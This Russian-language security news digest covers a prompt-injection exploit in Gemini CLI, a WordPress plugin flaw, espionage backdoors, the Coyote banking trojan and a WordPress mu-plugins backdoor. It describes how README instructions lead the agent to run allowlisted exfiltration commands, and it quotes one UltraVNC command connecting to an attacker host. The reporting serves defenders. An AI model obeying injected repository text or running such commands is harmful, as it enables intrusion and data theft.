Эксплойт работает за счет использования процесса обработки Gemini CLI «контекстных файлов», в частности README.md и GEMINI.md, которые считываются в командной строке для анализа кодовой базы.

Исследователи Tracebit выяснили, что в этих файлах можно скрыть вредоносные инструкции для выполнения внедрения, в то время как плохой синтаксический анализ команд и обработка списков разрешений оставляют место для выполнения вредоносного кода.

Они продемонстрировали атаку, создав репозиторий, содержащий безобидный скрипт Python и зараженный файл README.md, а затем запустили его сканирование с помощью Gemini CLI.

Сначала Gemini получает указание запустить безобидную команду (grep ^Setup README.md), а затем запустить следующую за ней вредоносную команду извлечения данных, которая рассматривается как доверенное действие и не требует одобрения пользователя.

При этом вредоносная команда может быть любой (установка удаленной оболочки, удаление файлов и т.д.).

Более того, выходные данные Gemini можно визуально изменять с помощью пробелов, чтобы скрыть вредоносную команду от пользователя.

Безусловно, для атаки требуются некоторые серьезные предпосылки (например, предполагается, что у пользователя есть разрешенные определенные команды), но при определенных условиях во многих случаях злоумышленник может добиться желаемых результатов.

Пользователям Gemini CLI рекомендуется обновиться до версии 0.1.14 последней), а также избегать запуска инструмента с неизвестными или ненадёжными кодовыми базами (либо делать это только в изолированных средах).

Tracebit протестировала метод атаки на других подобных инструментах, включая OpenAI Codex и Anthropic Claude, но как оказалось, безуспешно, в виду реализации более надежных механизмов разрешенного списка.

Более 200 000 сайтов WordPress продолжают работать с уязвимой версией плагина Post SMTP, которая позволяет получить контроль над учетной записью администратора.

Post SMTP - популярный плагин для обработки электронной почты в WordPress с более чем 400 000 активных установок, который позиционируется как более надёжная и многофункциональная реализация стандартной функции wp_mail().

23 мая сообщение об уязвимости было направлено в PatchStack. Уязвимости был присвоен CVE-2025-24000 и оценка CVSS 8,8.

Проблема затрагивает все версии Post SMTP до 3.2.0 и вызвана некорректным механизмом контроля доступа в конечных точках REST API плагина, который проверял только, вошел ли пользователь в систему, не проверяя при этом уровень его разрешений.

Так что пользователи с низкими привилегиями (такие как подписчики), могли получить доступ к журналам электронной почты со всем ее содержимым.

Подписчик мог инициировать сброс пароля для учетной записи администратора, перехватить соответствующее электронное письмо через журналы и получить контроль над учетной записью.

Разработчики плагина представили исправление для рассмотрения Patchstack 26 мая.

Проблему удалось решить включением дополнительных проверок привилегий в get_logs_permission перед предоставлением доступа к конфиденциальным вызовам API.

Исправление было включено в версию Post SMTP 3.3.0, опубликованную 11 июня.

Тем не менее, статистика загрузок на WordPress указывает на то, что лишь менее половины пользователей плагина (48,5%) обновились до версии 3.3.

При это более 200 000 сайтов остаются уязвимы к CVE-2025-24000, а половина из них и вовсе используют версии Post SMTP из ветки 2.x, уязвимые также для ряда иных проблем, формируя практически идеальные условия для атаки на цепочку мудаков реализации масштабной кампании.

Доброго понедельника, наши дорогие друзья!

Мы все утро изучаем словарь метафор и идиоматических выражений, чтобы литературным русским языком описать то, что, согласно Приказу ФСБ России № 547, описывать нельзя.

Нашли две формы - пословицы да поговорки и поэтическую.

Во-первых, не так страшен черт как его малювати.

А во-вторых, нефиг было сиси мять - CISO сразу надо брать!

Исследователи Seqrite Labs раскрыли кампанию кибершпионажа Operation CargoTalon, нацеленную на российские предприятия аэрокосмической и оборонной отраслей с использованием бэкдора EAGLET.

Вредоносная активность была атрибутирована к кластеру угроз, отслеживаемому как UNG0901 (Unknown Group 901).

Целями стали сотрудники Воронежского авиационного производственного объединения, одного из крупнейших предприятий по производству самолетов в России.

В атаках задействовались фишинговые письма с приманками на тему доставки грузов с ZIP-архивом, внутри которого находился LNK-файл, использующий PowerShell для отображения поддельного документа Microsoft Excel, а также внедряющий на хост файл DLL EAGLET.

EAGLET реализует сбор системной информации и устанавливает соединения с жестко запрограммированным удаленным сервером («185.225.17[.]104»), а после получения HTTP-ответа - выполняет на скомпрометированной машине Windows команды.

Имплант поддерживает доступ к оболочке и возможность загрузки/выгрузки файлов, но точный характер доставляемых полезных нагрузок следующего этапа неизвестен, учитывая, что сервер C2 к моменту исследования оставался в автономном режиме.

Исследователи Seqrite заявляют, что также обнаружили схожие кампании в отношении российского ВПК с использованием EAGLET, не говоря уже о совпадениях исходного кода и целей с Head Mare, о которых ранее сообщали исследователи Лаборатории Касперского.

В частности, отмечены функциональные параллели между EAGLET и PhantomDL - бэкдором на базе Go с оболочкой и возможностью загрузки/выгрузки файлов, а также сходство в алгоритме наименований, применяемой к вложениям в фишинговых сообщениях.

Индикаторы компрометации и технические подробности - в отчете индийской компании.

Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атакующие впервые использовали документы Microsoft OneNote для маскировки ВПО.

15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.

Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.

Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).

В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.

После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.

Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.

Исследователи Akamai проанализировали последнюю версию банковского трояна для Windows - Coyote, и обнаружили задействование фреймворка Microsoft UI Automation (UIA) для получения данных со скомпрометированных устройств.

Фактически, по данным Akamai, Coyote - это первая вредоносная ПО, которая использует фреймворк UIA.

Coyote, впервые задокументированный Лабораторией Касперского в 2024 году, используется для атак на устройства Windows в Латинской Америке.

Он поддерживает кейлоггеры и фишинговые оверлеи для сбора данных, в частности, учётных данных для банковских и криптосервисов. 

UIA является частью Microsoft .NET Framework и представляет собой легитимную функцию Microsoft, обеспечивающую программный доступ к элементам пользовательского интерфейса на рабочем столе.

Он позволяет вспомогательным технологическим продуктам предоставлять конечным пользователям информацию о пользовательском интерфейсе и управлять им с помощью средств, отличных от стандартного ввода.

В декабре 2024 года Akamai предупредила, что злоумышленники могут использовать UIA в вредоносных целях, заставляя пользователя запустить специально созданное приложение, использующее эту платформу. 

Исследователи продемонстрировали возможности использования UIA для скрытого выполнения команд, перенаправления браузера и кражи конфиденциальных данных. Атаки работают на любой версии Windows и позволяют обходить защитные решения.

Недавно компания Akamai обнаружила, что ранее описанные риски теперь имеют вполне практическую реализацию: разработчики вредоносных ПО начали злоупотреблять UIA.

Причем Coyote, по-видимому, стал первым вредоносным ПО, операторы которого смогли сделать это в реальных условиях.

Несмотря на то, что UIA потенциально может использоваться для кражи конфиденциальных данных, разработчики Coyote полагаются на него для определения, какими финансовыми услугами пользуется жертва.

Вредоносная ПО сначала использует API Windows для получения заголовков открытых окон, проверяя их соответствие списку жёстко запрограммированных адресов веб-сайтов, связанных с банками и криптосервисами. 

Если совпадений не обнаружено, вредоносная программа использует UIA для анализа дочерних элементов пользовательского интерфейса окна, что позволяет ей проверять вкладки и адресные строки браузера на соответствие зашитым в код адресам веб-сайтов.

Последняя версия вредоносного ПО таргетируется на 75 различных финансовых учреждений, в то время как ранее в январе этого года лаборатория Fortinet FortiGuard Labs фиксировала 73.

Как отмечаюи исследователи, без UIA разбор подэлементов другого приложения - достаточно нетривиальная задача.

Ведь чтобы эффективно читать содержимое подэлементов в другом приложении, разработчику необходимо очень хорошо понимать структуру конкретного целевого приложения.

Кроме того, Coyote может выполнять проверки независимо от того, находится ли вредоносная ПО в онлайн-режиме или в оффлайне, а это значительно увеличивает шансы успешно идентифицировать целевой банк или криптобиржу жертвы для того, что выкрасть учётные данные.

Исследователи обнаружили новый бэкдор, скрытый в каталоге mu-plugins на сайтах WordPress, который предоставляет злоумышленникам постоянный доступ и позволяет им выполнять произвольные действия.

Обязательные плагины (также известные как mu-plugins) — это спецплагины, которые автоматически активируются на всех сайтах WordPress в процессе установки.

По умолчанию они размещаются в каталоге wp-content/mu-plugins.

Эта особенность вызывает особую привлекательность для злоумышленников, так mu-plugins не отображаются в списке плагинов по умолчанию в wp-admin и не могут быть отключены, кроме как путем удаления файла плагина из обязательного для использования каталога.

В результате вредоносная ПО, использующая эту технику, может функционировать незаметно, не вызывая подозрений.

Обнаруженный Sucuri PHP-скрипт в каталоге mu-plugins (wp-index.php) служит загрузчиком для извлечения полезной нагрузки следующего этапа и сохранения ее в базе данных WordPress в таблице wp_options в разделе _hdra_core.

Удаленная полезная нагрузка извлекается из URL-адреса, который зашифрован с помощью ROT13 - простого подстановочного шифра, который заменяет букву на 13-ю букву после нее (т.е. A становится N, B - O, C - P и т.д.).

Извлеченный контент затем временно записывается на диск и выполняется.

Бэкдор предоставляет злоумышленнику постоянный доступ к сайту и возможность удалённо запускать любой PHP-код.

В частности, он внедряет скрытый файловый менеджер в каталог темы под именем pricing-table-3.php, позволяя злоумышленникам просматривать, загружать и удалять файлы.

Он также создаёт пользователя-администратора с именем officialwp, а затем загружает вредоносный плагин (wp-bot-protect.php) и активирует его.

Помимо повторного заражения в случае удаления, вредоносная ПО позволяет менять пароли админов (с распространенными именами «admin», «root» и «wpsupport»), на пароль по умолчанию, установленный злоумышленником.

Опция также затрагивает пользователя officialwp.

При этом злоумышленники могут получать постоянный доступ к сайтам и выполнять вредоносные действия, фактически блокируя других администраторов.

Диапазон вредоносных действий может варьироваться от кражи данных до внедрения кода, который может заражать посетителей вредоносным ПО или перенаправлять их на другие сайты.